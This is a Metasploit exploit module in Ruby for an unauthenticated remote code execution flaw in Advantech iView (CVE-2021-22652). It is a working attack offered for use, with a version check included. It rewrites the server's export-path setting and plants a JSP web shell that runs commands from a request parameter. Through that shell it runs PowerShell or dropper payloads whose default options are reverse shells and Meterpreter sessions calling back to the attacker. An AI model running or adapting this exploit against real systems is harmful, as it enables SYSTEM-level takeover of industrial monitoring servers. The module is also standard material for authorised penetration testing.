## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Powershell include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'Advantech iView Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits an unauthenticated configuration change combined with an unauthenticated file write primitive, leading to an arbitrary file write that allows for remote code execution as the user running iView, which is typically NT AUTHORITY\SYSTEM. This issue was demonstrated in the vulnerable version 5.7.02.5992 and fixed in version 5.7.03.6112. }, 'Author' => [ 'wvu', # Discovery and exploit 'Spencer McIntyre' # Check, docs, and testing ], 'References' => [ ['CVE', '2021-22652'], ['URL', 'https://blog.rapid7.com/2021/02/11/cve-2021-22652-advantech-iview-missing-authentication-rce-fixed/'], ['URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-040-02'] ], 'DisclosureDate' => '2021-02-09', # ICS-CERT advisory 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => true, 'Targets' => [ [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :win_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' } } ], [ 'Windows Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :win_dropper, 'DefaultOptions' => { 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest, 'PAYLOAD' => 'windows/x64/meterpreter_reverse_https' } } ], [ 'PowerShell Stager', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :psh_stager, 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https' } } ] ], 'DefaultTarget' => 2, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK] } ) ) register_options([ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'Application path', '/iView3']) ]) end def check res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'MenuServlet'), 'vars_post' => { 'page_action_type' => 'getMenuFragment', 'page' => 'version.frag' } ) return CheckCode::Unknown unless res&.code == 200 version = res.get_html_document.xpath('string(//input[starts-with(@value, "Version")]/@value)') return CheckCode::Unknown unless version =~ /Version (\d+\.\d+) \(Build ([\d.]+)\)/ version = "#{Regexp.last_match(1)}.#{Regexp.last_match(2)}" vprint_status("Identified the version as #{version}") return CheckCode::Safe if Rex::Version.new(version) >= Rex::Version.new('5.7.03.6112') CheckCode::Appears end def exploit config = retrieve_config updated = update_config(config) write_jsp_stub print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :win_cmd execute_command(payload.encoded) when :win_dropper execute_cmdstager when :psh_stager execute_command(cmd_psh_payload( payload.encoded, payload.arch.first, remove_comspec: true )) end ensure restore_config(config) if config && updated end def retrieve_config print_status('Retrieving config') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'NetworkServlet'), 'vars_post' => { 'page_action_type' => 'retrieveSystemSettings' } ) unless res && res.code == 200 && (config = res.get_json_document.first) fail_with(Failure::NotFound, 'Failed to retrieve config') end print_good('Successfully retrieved config') vprint_line(JSON.pretty_generate(config)) config end def update_config(config) print_status('Updating config') config = config.dup config['EXPORTPATH'] = 'webapps\\iView3\\' res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'NetworkServlet'), 'vars_post' => { 'page_action_type' => 'updateSystemSettings', 'json_obj' => config.to_json } ) unless res && res.code == 200 && (config = res.get_json_document.first) fail_with(Failure::NotFound, 'Failed to retrieve updated config') end unless config['EXPORTPATH'] == 'webapps\\iView3\\' fail_with(Failure::NotVulnerable, 'Failed to update config') end print_good('Successfully updated config') vprint_line(JSON.pretty_generate(config)) true end def write_jsp_stub print_status('Writing JSP stub') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'NetworkServlet'), 'vars_post' => { 'page_action_type' => 'exportInventoryTable', 'col_list' => "#{jsp_stub}-NULL", 'sortname' => 'NULL', 'sortorder' => '', 'filename' => jsp_filename } ) unless res && res.code == 200 fail_with(Failure::NotVulnerable, 'Failed to write JSP stub') end register_file_for_cleanup("webapps\\iView3\\#{jsp_filename}") print_good('Successfully wrote JSP stub') end def execute_command(cmd, _opts = {}) cmd.prepend('cmd.exe /c ') print_status("Executing command: #{cmd}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, jsp_filename), 'vars_post' => { jsp_param => cmd } ) unless res && res.code == 200 fail_with(Failure::PayloadFailed, 'Failed to execute command') end print_good('Successfully executed command') end def restore_config(config) print_status('Restoring config') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'NetworkServlet'), 'vars_post' => { 'page_action_type' => 'updateSystemSettings', 'json_obj' => config.to_json } ) unless res && res.code == 200 && (config = res.get_json_document.first) fail_with(Failure::NotFound, 'Failed to retrieve restored config') end if config['EXPORTPATH'] == 'webapps\\iView3\\' fail_with(Failure::UnexpectedReply, 'Failed to restore config') end print_good('Successfully restored config') vprint_line(JSON.pretty_generate(config)) end def jsp_stub %(<% Runtime.getRuntime().exec(request.getParameter("#{jsp_param}")); %>) end def jsp_param @jsp_param ||= rand_text_alphanumeric(8..42) end def jsp_filename @jsp_filename ||= "#{rand_text_alphanumeric(8..42)}.jsp" end end